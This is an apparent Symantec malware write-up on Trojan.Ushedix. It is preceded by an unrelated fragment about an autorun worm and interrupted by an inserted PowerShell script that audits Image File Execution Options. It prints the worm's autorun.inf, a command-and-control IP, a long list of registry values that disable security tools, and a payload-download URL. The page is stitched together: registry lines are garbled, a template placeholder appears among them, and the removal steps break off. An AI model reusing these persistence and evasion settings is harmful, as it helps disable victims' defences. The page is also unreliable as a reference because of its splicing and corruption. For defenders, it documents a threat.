SysSafe.exe
TrojDie.kxp
WoptiProcess.exe

Attempts to close windows containing these strings:
ZoneAlarm
ZoneAlarm Pro

Attempts to connect to 218.16.138.64 on TCP port 81.

Propagation
It attempts to propagate by creating "\runauto..\autorun.pif" and "\autorun.inf" on all available drives, including removable drives. The autorun.inf file is detected as Worm.Win32.AutoRun.dms. The autorun.inf appears as:

[AutoRun]
open=RUNAUT~1\autorun.pif
shell\1=打开(&O)
shell\1\Command=RUNAUT~1\autorun.pif
shell\2\=浏览(&B)
shell\2\Command=RUNAUT~1\autorun.pif
shellexecute=RUNAUT~1\autorun.pif

To make sure it will only run once, the mutex "Red_Server_2007" is created.

File System Changes
Creates these directories:
%drive%\runauto..\
Trojan.Ushedix | Symantec Security Center

Discovered: June 28, 2008
Updated: June 28, 2008 10:56:37 AM
Type: Trojan
Infection Length: 19,381 bytes
Systems Affected: Windows

Trojan.Ushedix is a Trojan horse that replaces system files and infects the user32.dll file in order to download potentially malicious files.

Antivirus Protection Dates
Initial Rapid Release version: June 28, 2008 revision 001
Latest Rapid Release version: May 07, 2019 revision 006
Initial Daily Certified version: June 28, 2008 revision 004
Latest Daily Certified version: May 07, 2019 revision 008
Initial Weekly Certified release date: July 02, 2008
Technical Description
When the Trojan is executed, it creates the following file:
C:\NBA_Temp\__nba_ok__

It then replaces the following files with its components:
%System%\dxdiag.exe (Trojan.Ushedix)
%System%\winhlp32.exe (Trojan.Ushedix)

Next, the Trojan creates the following registry entries in order to disable certain security programs:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FYFireWall.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwmain.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPF.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Navapsvc.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Navapw32.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconsol.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webscanx.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NPFMntor.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsstat.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPfwSvc.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQKav.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctor.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EGHOST.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KPFWSvc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KRegEx.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KRepair.com\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KsLoader.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVCenter.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvDetect.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvfwMcl.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVMonXP.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVMonXP_1.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kvol.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kvolself.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvReport.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVScan.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KVSrvXP.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\Image File Execution Options\\KVStub.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kvupload.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\kvwsc.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvXP.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KvXP_1.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KWatch.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KWatch9x.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KWatchX.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\MagicSet.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mcconsol.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\mmqczj.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\KAV32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\nod32krn.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\PFWLiveUpdate.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution 
Options\\QHSET.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RavMonD.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RavStub.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RegClean.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwcfg.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RfwMain.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwsrv.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RsAgent.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Rsaupd.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\safelive.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\scan32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\shcfg32.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\SmartUp.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\SREng.EXE\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\symlcsvc.exe\\""Debugger"" = ""ntsd -d"" 
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\SysSafe.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\TrojanDetector.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Trojanwall.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\TrojDie.kxp\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UIHost.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxAgent.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxAttachment.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxCfg.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxFwHlp.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UmxPol.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\UpLive.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\procexp.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\rfwstub.exe\\""Debugger"" = ""ntsd -d"" HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\RegTool.exe\\""Debugger"" = ""ntsd -d"" 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RawCopy.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\filemon.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regmon.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntiArp.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GFUpd.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GFRing3.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQDoctorMain.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SelfUpdate.exe\"Debugger" = "ntsd -d"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Your Image File Name Here without a path\"Debugger" = "ntsd -d"

It then infects the file user32.dll so that the Trojan is executed every time user32.dll is loaded.

Note: The infected user32.dll is detected as Trojan.Ushedix!inf.
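The PowerShell script below is an added example and is not part of the Symantec write-up: it enumerates the Image File Execution Options keys, reports every Debugger value that is set, and flags those equal to "ntsd -d", the value this Trojan writes for each security tool listed above, which is also what step 4 of the removal instructions asks you to delete. The script name, its parameters and the Wow6432Node path are my assumptions, not anything taken from the page.

```powershell
# Audit-Ifeo.ps1 (added example, not from the Symantec write-up).
# A Debugger value under an Image File Execution Options subkey makes Windows
# start that command in place of the named image, so pointing every security
# tool at "ntsd -d" keeps those tools from running normally. This script lists
# such values and, with -Remove, deletes the flagged ones (honours -WhatIf).
# Run from an elevated PowerShell session on the host being examined:
#   .\Audit-Ifeo.ps1            # report only
#   .\Audit-Ifeo.ps1 -Remove    # also delete the flagged Debugger values
[CmdletBinding(SupportsShouldProcess = $true)]
param(
    [switch]$Remove,
    # Debugger strings treated as hijacks. "ntsd -d" is the value this Trojan
    # writes; add others if a different loader is abused the same way.
    [string[]]$SuspiciousDebuggers = @('ntsd -d')
)

# Native view, plus the 32-bit (Wow6432Node) view present on 64-bit Windows.
# The second path does not exist on a 32-bit system, so each root is tested.
$ifeoRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)

$findings = foreach ($root in $ifeoRoots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }
    foreach ($key in Get-ChildItem -LiteralPath $root -ErrorAction SilentlyContinue) {
        # Get-ItemProperty yields nothing (no error) when the value is absent.
        $debugger = (Get-ItemProperty -LiteralPath $key.PSPath -Name Debugger `
                        -ErrorAction SilentlyContinue).Debugger
        if ([string]::IsNullOrWhiteSpace($debugger)) { continue }
        [pscustomobject]@{
            Image      = $key.PSChildName
            Debugger   = $debugger
            Suspicious = ($SuspiciousDebuggers -contains $debugger.Trim())
            Key        = $key.PSPath
        }
    }
}

if (-not $findings) {
    Write-Host 'No IFEO Debugger values are set.'
    return
}

# Every Debugger value deserves a look: legitimate ones are rare and point at
# a real debugger or a vendor tool. Rows marked Suspicious match this Trojan.
$findings |
    Sort-Object -Property Suspicious -Descending |
    Format-Table -Property Image, Suspicious, Debugger -AutoSize

if ($Remove) {
    foreach ($f in $findings | Where-Object { $_.Suspicious }) {
        # Remove only the Debugger value; the subkey and any other settings
        # under it (for example vendor-set options) are left in place.
        if ($PSCmdlet.ShouldProcess($f.Key, 'Remove hijacked Debugger value')) {
            Remove-ItemProperty -LiteralPath $f.Key -Name Debugger
        }
    }
}
```

Back up the registry first, as the removal instructions say, and review any unflagged Debugger values by hand before deciding they are legitimate.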
The Trojan downloads a configuration file from the following location:
[http://]www.infomt.net/dk.[REMOVED]

It then downloads potentially malicious files onto the compromised computer.

The Trojan copies the file %System%\dxdiag.exe to %System%\NBA.exe and then deletes itself.

Recommendations
Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":

Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have fewer avenues of attack.
If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.

For further information on the terms used in this document, please refer to the Security Response glossary.

Removal
The following instructions pertain to all current and recent Symantec antivirus products, including the Symantec AntiVirus and Norton AntiVirus product lines.

Disable System Restore (Windows Me/XP).
Update the virus definitions.
Run a full system scan.
Delete any values added to the registry.
Extract and restore Windows files.

For specific details on each of these steps, read the following instructions.

1. To disable System Restore (Windows Me/XP)
If you are running Windows Me or Windows XP, we recommend that you temporarily turn off System Restore. Windows Me/XP uses this feature, which is enabled by default, to restore the files on your computer in case they become damaged. If a virus, worm, or Trojan infects a computer, System Restore may back up the virus, worm, or Trojan on the computer.

Windows prevents outside programs, including antivirus programs, from modifying System Restore. Therefore, antivirus programs or tools cannot remove threats in the System Restore folder. As a result, System Restore has the potential to restore an infected file on your computer, even after you have cleaned the infected files from all the other locations.

Also, a virus scan may detect a threat in the System Restore folder even though you have removed the threat.

For instructions on how to turn off System Restore, read your Windows documentation, or one of the following articles:
How to disable or enable Windows Me System Restore
How to turn off or turn on Windows XP System Restore

Note: When you are completely finished with the removal procedure and are satisfied that the threat has been removed, re-enable System Restore by following the instructions in the aforementioned documents.

For additional information, and an alternative to disabling Windows Me System Restore, see the Microsoft Knowledge Base article: Antivirus Tools Cannot Clean Infected Files in the _Restore Folder (Article ID: Q263455).

2. To update the virus definitions
Symantec Security Response fully tests all the virus definitions for quality assurance before they are posted to our servers. There are two ways to obtain the most recent virus definitions:

Running LiveUpdate, which is the easiest way to obtain virus definitions. If you use Norton AntiVirus 2006, Symantec AntiVirus Corporate Edition 10.0, or newer products, LiveUpdate definitions are updated daily. These products include newer technology. If you use Norton AntiVirus 2005, Symantec AntiVirus Corporate Edition 9.0, or earlier products, LiveUpdate definitions are updated weekly. The exception is major outbreaks, when definitions are updated more often.
Downloading the definitions using the Intelligent Updater: The Intelligent Updater virus definitions are posted daily. You should download the definitions from the Symantec Security Response Web site and manually install them. The latest Intelligent Updater virus definitions can be obtained here: Intelligent Updater virus definitions. For detailed instructions read the document: How to update virus definition files using the Intelligent Updater.

3. To run a full system scan
Start your Symantec antivirus program and make sure that it is configured to scan all the files.
For Norton AntiVirus consumer products: Read the document: How to configure Norton AntiVirus to scan all files.
For Symantec AntiVirus Enterprise products: Read the document: How to verify that a Symantec Corporate antivirus product is set to scan all files.
Run a full system scan.
If any files are detected, follow the instructions displayed by your antivirus program.

Important: If you are unable to start your Symantec antivirus product or the product reports that it cannot delete a detected file, you may need to stop the risk from running in order to remove it. To do this, run the scan in Safe mode. For instructions, read the document: How to start the computer in Safe Mode. Once you have restarted in Safe mode, run the scan again.

After the files are deleted, restart the computer in Normal mode and proceed with the next section.

Warning messages may be displayed when the computer is restarted, since the threat may not be fully removed at this point. You can ignore these messages and click OK. These messages will not appear when the computer is restarted after the removal instructions have been fully completed. The messages displayed may be similar to the following:

Title: [FILE PATH]
Message body: Windows cannot find [FILE NAME]. Make sure you typed the name correctly, and then try again.
To search for a file, click the Start button, and then click Search.

4. To delete the value from the registry
